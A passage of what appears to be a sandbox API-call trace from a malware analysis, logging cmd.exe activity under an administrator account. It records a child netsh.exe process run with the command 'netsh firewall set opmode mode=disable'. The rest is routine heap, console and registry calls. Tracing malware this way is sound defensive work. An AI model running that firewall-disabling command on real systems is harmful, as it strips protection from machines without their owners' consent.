(_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0173.875] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0173.875] GetProcessHeap () returned 0x2e0000 [0173.875] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0173.875] GetProcessHeap () returned 0x2e0000 [0173.875] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f9a40 [0173.875] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\netsh.exe", lpCommandLine="netsh firewall set opmode mode=disable", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x20f1b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh firewall set opmode mode=disable", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f160 | out: lpCommandLine="netsh firewall set opmode mode=disable", lpProcessInformation=0x20f160*(hProcess=0x50, hThread=0x54, dwProcessId=0x4fc, dwThreadId=0x560)) returned 1 [0173.878] CloseHandle (hObject=0x54) returned 1 [0173.878] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0173.878] GetProcessHeap () returned 0x2e0000 [0173.878] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ff370 | out: hHeap=0x2e0000) returned 1 [0173.878] GetEnvironmentStringsW () returned 0x2fb240* [0173.879] GetProcessHeap () returned 0x2e0000 [0173.879] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0173.879] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0173.879] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x20ea68, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x20ea68, ReturnLength=0x0) returned 0x0 [0173.879] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdf000, lpBuffer=0x20eaa0, nSize=0x380, lpNumberOfBytesRead=0x20ea60 | out: lpBuffer=0x20eaa0*, lpNumberOfBytesRead=0x20ea60*=0x380) returned 1 [0173.879] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0178.379] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f0a8 | out: lpExitCode=0x20f0a8*=0x0) returned 1 [0178.379] CloseHandle (hObject=0x50) returned 1 [0178.379] _vsnwprintf (in: _Buffer=0x20f318, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f0b8 | out: _Buffer="00000000") returned 8 [0178.379] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.379] GetProcessHeap () returned 0x2e0000 [0178.379] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x2e0000) returned 1 [0178.379] GetEnvironmentStringsW () returned 0x2fb240* [0178.379] GetProcessHeap () returned 0x2e0000 [0178.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0178.379] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0178.379] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.379] GetProcessHeap () returned 0x2e0000 [0178.379] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x2e0000) returned 1 [0178.379] GetEnvironmentStringsW () returned 0x2fb240* [0178.379] GetProcessHeap () returned 0x2e0000 [0178.379] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0178.379] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0178.379] GetProcessHeap () returned 0x2e0000 [0178.379] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9a40 | out: hHeap=0x2e0000) returned 1 [0178.379] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f178 | out: lpAttributeList=0x20f178) [0178.379] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0178.380] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.380] SetConsoleMode (hConsoleHandle=0xb8, dwMode=0x0) returned 0 [0178.380] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.380] GetConsoleMode (in: hConsoleHandle=0xb8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0178.381] _get_osfhandle (_FileHandle=0) returned 0xac [0178.381] GetConsoleMode (in: hConsoleHandle=0xac, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0178.381] GetConsoleOutputCP () returned 0x1b5 [0178.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0178.381] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0178.381] GetProcessHeap () returned 0x2e0000 [0178.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9d00 | out: hHeap=0x2e0000) returned 1 [0178.381] GetProcessHeap () returned 0x2e0000 [0178.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0178.381] GetProcessHeap () returned 0x2e0000 [0178.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5b70 | out: hHeap=0x2e0000) returned 1 [0178.381] GetProcessHeap () returned 0x2e0000 [0178.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1320 | out: hHeap=0x2e0000) returned 1 [0178.381] GetProcessHeap () returned 0x2e0000 [0178.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f99d0 | out: hHeap=0x2e0000) returned 1 [0178.381] GetProcessHeap () returned 0x2e0000 [0178.381] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0178.382] GetProcessHeap () returned 0x2e0000 [0178.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9880 | out: hHeap=0x2e0000) returned 1 [0178.382] GetProcessHeap () returned 0x2e0000 [0178.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4610 | out: hHeap=0x2e0000) returned 1 [0178.382] GetProcessHeap () returned 0x2e0000 [0178.382] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f97c0 | out: hHeap=0x2e0000) returned 1 [0178.382] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20f5d8 | out: _Buffer="\r\n") returned 2 [0178.382] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.382] GetFileType (hFile=0xb8) returned 0x3 [0178.382] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.382] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0178.382] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f5a8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f5a8*=0x2, lpOverlapped=0x0) returned 1 [0178.382] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0178.382] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0178.382] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x20f5e8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0178.382] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x20f5e8 | out: _Buffer=">") returned 1 [0178.382] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.382] GetFileType (hFile=0xb8) returned 0x3 [0178.382] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.382] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0178.382] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x20f5d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f5d8*=0x14, lpOverlapped=0x0) returned 1 [0178.383] _get_osfhandle (_FileHandle=0) returned 0xac [0178.383] GetFileType (hFile=0xac) returned 0x3 [0178.383] _get_osfhandle (_FileHandle=0) returned 0xac [0178.383] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.383] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0178.383] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="eetsh firewall set opmode mode=disable\nate off\n") returned 1 [0178.383] _get_osfhandle (_FileHandle=0) returned 0xac [0178.383] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.383] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0178.383] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="xtsh firewall set opmode mode=disable\nate off\n") returned 1 [0178.383] _get_osfhandle (_FileHandle=0) returned 0xac [0178.383] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.383] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0178.383] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="ish firewall set opmode mode=disable\nate off\n") returned 1 [0178.383] _get_osfhandle (_FileHandle=0) returned 0xac [0178.383] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.383] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0178.383] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="th firewall set opmode mode=disable\nate off\n") returned 1 [0178.383] _get_osfhandle (_FileHandle=0) returned 0xac [0178.383] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.383] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0178.383] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr="\n firewall set opmode mode=disable\nate off\n") returned 1 [0178.384] _get_osfhandle (_FileHandle=0) returned 0xac [0178.384] GetFileType (hFile=0xac) returned 0x3 [0178.384] _get_osfhandle (_FileHandle=0) returned 0xac [0178.384] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.384] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.384] GetFileType (hFile=0xb8) returned 0x3 [0178.384] _get_osfhandle (_FileHandle=1) returned 0xb8 [0178.384] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="exit\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="exit\n", lpUsedDefaultChar=0x0) returned 6 [0178.384] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x20f8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f8b8*=0x5, lpOverlapped=0x0) returned 1 [0178.384] GetProcessHeap () returned 0x2e0000 [0178.384] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x300e70 [0178.384] GetProcessHeap () returned 0x2e0000 [0178.384] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x300e70 | out: hHeap=0x2e0000) returned 1 [0178.384] GetProcessHeap () returned 0x2e0000 [0178.384] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97c0 [0178.384] GetProcessHeap () returned 0x2e0000 [0178.384] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1a) returned 0x2f4610 [0178.384] GetConsoleOutputCP () returned 0x1b5 [0178.385] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0178.385] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0178.385] GetConsoleTitleW (in: lpConsoleTitle=0x20f870, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0178.385] GetProcessHeap () returned 0x2e0000 [0178.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x14) returned 0x2f5c50 [0178.385] GetProcessHeap () returned 0x2e0000 [0178.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1a) returned 0x2f4640 [0178.385] GetProcessHeap () returned 0x2e0000 [0178.385] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2f9be0 [0178.385] GetConsoleTitleW (in: lpConsoleTitle=0x2f9bf0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0178.385] GetProcessHeap () returned 0x2e0000 [0178.385] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9be0, Size=0x80) returned 0x2f9be0 [0178.385] GetProcessHeap () returned 0x2e0000 [0178.385] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9be0) returned 0x80 [0178.385] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - exit") returned 1 [0178.386] GetProcessHeap () returned 0x2e0000 [0178.386] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0178.386] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0178.386] exit (_Code=0) Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x16391000" os_pid = "0x698" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0x5e8" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0x694 [0124.353] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efed0 | out: lpSystemTimeAsFileTime=0x1efed0*(dwLowDateTime=0x5121c390, dwHighDateTime=0x1d4f12b)) [0124.353] GetCurrentProcessId () returned 0x698 [0124.353] GetCurrentThreadId () returned 0x694 [0124.353] GetTickCount () returned 0xac26 [0124.353] QueryPerformanceCounter (in: lpPerformanceCount=0x1efed8 | out: lpPerformanceCount=0x1efed8*=8867997103) returned 1 [0124.354] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab10000 [0124.354] __set_app_type (_Type=0x1) [0124.354] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab37810) returned 0x0 [0124.355] __getmainargs (in: _Argc=0x4ab5a608, _Argv=0x4ab5a618, _Env=0x4ab5a610, _DoWildCard=0, _StartInfo=0x4ab3e0f4 | out: _Argc=0x4ab5a608, _Argv=0x4ab5a618, _Env=0x4ab5a610) returned 0 [0124.355] GetCurrentThreadId () returned 0x694 [0124.355] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x694) returned 0x3c [0124.355] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000 [0124.356] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b26d40 [0124.356] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.356] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.356] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efe68 | out: phkResult=0x1efe68*=0x0) returned 0x2 [0124.356] VirtualQuery (in: lpAddress=0x1efe50, lpBuffer=0x1efdd0, dwLength=0x30 | out: lpBuffer=0x1efdd0*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.356] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efdd0, dwLength=0x30 | out: lpBuffer=0x1efdd0*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.356] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efdd0, dwLength=0x30 | out: lpBuffer=0x1efdd0*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.356] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1efdd0, dwLength=0x30 | out: lpBuffer=0x1efdd0*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.356] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efdd0, dwLength=0x30 | out: lpBuffer=0x1efdd0*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0124.356] GetConsoleOutputCP () returned 0x1b5 [0124.356] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0124.357] SetConsoleCtrlHandler (HandlerRoutine=0x4ab33184, Add=1) returned 1 [0124.357] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.357] SetConsoleMode (hConsoleHandle=0xa8, dwMode=0x0) returned 0 [0124.357] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.357] GetConsoleMode (in: hConsoleHandle=0xa8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0124.357] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.357] GetConsoleMode (in: hConsoleHandle=0x9c, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0124.357] GetEnvironmentStringsW () returned 0x2f8a60* [0124.358] GetProcessHeap () returned 0x2e0000 [0124.358] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2f94f0 [0124.358] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.358] GetProcessHeap () returned 0x2e0000 [0124.358] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x8) returned 0x2f88e0 [0124.358] GetEnvironmentStringsW () returned 0x2f8a60* [0124.358] GetProcessHeap () returned 0x2e0000 [0124.358] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2f9f80 [0124.358] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.358] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed28 | out: phkResult=0x1eed28*=0x44) returned 0x0 [0124.358] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x0, lpData=0x1eed40*=0x18, lpcbData=0x1eed24*=0x1000) returned 0x2 [0124.358] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x1, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.358] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x0, lpData=0x1eed40*=0x1, lpcbData=0x1eed24*=0x1000) returned 0x2 [0124.358] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x0, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.358] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x40, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.358] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x40, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x0, lpData=0x1eed40*=0x40, lpcbData=0x1eed24*=0x1000) returned 0x2 [0124.359] RegCloseKey (hKey=0x44) returned 0x0 [0124.359] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed28 | out: phkResult=0x1eed28*=0x44) returned 0x0 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x0, lpData=0x1eed40*=0x40, lpcbData=0x1eed24*=0x1000) returned 0x2 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x4, lpData=0x1eed40*=0x1, lpcbData=0x1eed24*=0x4) returned 0x0 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, lpcbData=0x1eed24*=0x1000 | out: lpType=0x1eed20*=0x0, lpData=0x1eed40*=0x1, lpcbData=0x1eed24*=0x1000) returned 0x2 [0124.359] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed20, lpData=0x1eed40, 